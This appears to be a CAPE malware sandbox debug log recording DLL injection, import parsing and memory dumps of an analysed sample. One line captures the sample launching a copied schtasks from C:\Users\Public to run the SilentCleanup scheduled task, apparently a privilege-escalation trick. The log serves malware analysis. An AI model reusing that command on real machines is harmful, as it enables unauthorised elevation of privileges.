2020-03-24 10:13:26,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,428 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,428 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,460 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,476 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,492 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,492 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,492 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,492 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,538 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,553 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,553 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,585 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:26,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:26,601 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:26,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:26,601 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:26,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:26,615 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:26,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:26,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,615 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:26,631 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:26,631 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00C80000
2020-03-24 10:13:26,631 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00C81BCA
2020-03-24 10:13:26,631 [root] DEBUG: Module image dump success
2020-03-24 10:13:26,631 [root] DEBUG: DumpProcessFixImports: Found IAT - 0xc80ffc, size: 0x1ec
2020-03-24 10:13:26,631 [root] DEBUG: IAT parsing finished, found 116 valid APIs, missed 0 APIs
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:26,648 [root] DEBUG: Adding module to module list: ws2_32.dll
2020-03-24 10:13:26,663 [root] DEBUG: Adding module to module list: shlwapi.dll
2020-03-24 10:13:26,663 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:26,663 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:26,663 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:26,694 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1592_56272227126132024232020
2020-03-24 10:13:26,740 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\1592.dmp.
2020-03-24 10:13:26,740 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:26,740 [root] INFO: Notified of termination of process with pid 1592.
2020-03-24 10:13:26,990 [root] INFO: Announced 32-bit process name: schtasks.exe pid: 2212
2020-03-24 10:13:26,990 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:26,990 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:26,990 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:26,990 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:27,006 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:27,006 [root] DEBUG: Loader: Injecting process 2212 (thread 972) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,006 [root] DEBUG: Process image base: 0x00E00000
2020-03-24 10:13:27,006 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,038 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:27,052 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,052 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2212
2020-03-24 10:13:27,099 [root] INFO: Announced 32-bit process name: schtasks.exe pid: 2212
2020-03-24 10:13:27,099 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:27,099 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:27,099 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:27,099 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:27,099 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:27,099 [root] DEBUG: Loader: Injecting process 2212 (thread 972) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,115 [root] DEBUG: Process image base: 0x00E00000
2020-03-24 10:13:27,115 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,115 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:27,115 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:27,115 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2212
2020-03-24 10:13:27,427 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:27,427 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:27,427 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:27,427 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:27,427 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:27,443 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:27,443 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2212 at 0x74880000, image base 0xe00000, stack from 0x106000-0x110000
2020-03-24 10:13:27,443 [root] DEBUG: Commandline: C:\Users\Public\schtasks  \Run \TN \Microsoft\Windows\DiskCleanup\SilentCleanup \I.
2020-03-24 10:13:27,443 [root] INFO: Added new process to list with pid: 2212
2020-03-24 10:13:27,443 [root] INFO: Monitor successfully loaded in process with pid 2212.
2020-03-24 10:13:27,506 [root] DEBUG: DLL loaded at 0x74AA0000: C:\Windows\SysWOW64\VERSION (0x9000 bytes).
2020-03-24 10:13:27,506 [root] DEBUG: DLL unloaded from 0x00E00000.
2020-03-24 10:13:29,361 [root] INFO: Stopped Task Scheduler Service
2020-03-24 10:13:29,378 [root] INFO: Started Task Scheduler Service
2020-03-24 10:13:29,392 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:29,392 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:29,392 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:29,392 [lib.api.process] INFO: 64-bit DLL to inject is C:\lwhhhat\dll\GCogZIdy.dll, loader C:\lwhhhat\bin\wgJoSRuu.exe
2020-03-24 10:13:29,408 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:29,408 [root] DEBUG: Loader: Injecting process 816 (thread 0) with C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:29,408 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 820, handle 0x84
2020-03-24 10:13:29,408 [root] DEBUG: Process image base: 0x00000000FFA10000
2020-03-24 10:13:29,408 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-03-24 10:13:29,408 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-03-24 10:13:29,456 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:29,456 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:29,456 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:29,470 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:29,470 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:29,720 [root] WARNING: Unable to place hook on LockResource
2020-03-24 10:13:29,720 [root] WARNING: Unable to hook LockResource
2020-03-24 10:13:30,125 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 816 at 0x0000000074460000, image base 0x00000000FFA10000, stack from 0x0000000002646000-0x0000000002650000
2020-03-24 10:13:30,203 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k netsvcs.
2020-03-24 10:13:30,203 [root] INFO: Added new process to list with pid: 816
2020-03-24 10:13:30,203 [root] INFO: Monitor successfully loaded in process with pid 816.
2020-03-24 10:13:30,266 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-03-24 10:13:30,266 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-03-24 10:13:30,266 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:31,046 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF98B0000 to caller regions list (msvcrt::memcpy).
2020-03-24 10:13:31,358 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCEF0000 to caller regions list (ntdll::NtCreateFile).
2020-03-24 10:13:31,358 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCEF0000 to caller regions list (ntdll::NtCreateFile).
2020-03-24 10:13:31,358 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCEF0000 to caller regions list (ntdll::NtCreateFile).
2020-03-24 10:13:31,842 [lib.api.process] WARNING: Unable to find process dump for process 816.
2020-03-24 10:13:31,842 [root] INFO: Process with pid 816 has terminated
2020-03-24 10:13:32,295 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-03-24 10:13:32,372 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\SysWOW64\taskschd (0x7d000 bytes).
2020-03-24 10:13:32,559 [root] DEBUG: DLL loaded at 0x74500000: C:\Windows\System32\mstask (0x35000 bytes).
2020-03-24 10:13:32,607 [root] DEBUG: DLL loaded at 0x74360000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\COMCTL32 (0x19e000 bytes).
2020-03-24 10:13:32,732 [root] DEBUG: DLL loaded at 0x74350000: C:\Windows\SysWOW64\secur32 (0x8000 bytes).
2020-03-24 10:13:32,825 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\SysWOW64\cryptsp (0x16000 bytes).
2020-03-24 10:13:32,825 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\SysWOW64\credssp (0x8000 bytes).
2020-03-24 10:13:32,825 [root] DEBUG: DLL unloaded from 0x74C70000.
2020-03-24 10:13:32,825 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2212
2020-03-24 10:13:32,825 [root] DEBUG: GetHookCallerBase: thread 972 (handle 0x0), return address 0x00E17569, allocation base 0x00E00000.
2020-03-24 10:13:32,841 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\2212.dmp.
2020-03-24 10:13:32,918 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00E00000.
2020-03-24 10:13:32,918 [root] DEBUG: ApiReader: module list size: 27
2020-03-24 10:13:32,918 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,934 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:32,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:32,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,934 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,950 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,966 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,966 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,966 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,966 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,966 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,980 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:32,996 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,012 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,028 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,043 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,043 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,043 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,043 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,043 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,043 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,043 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,043 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,059 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:33,075 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
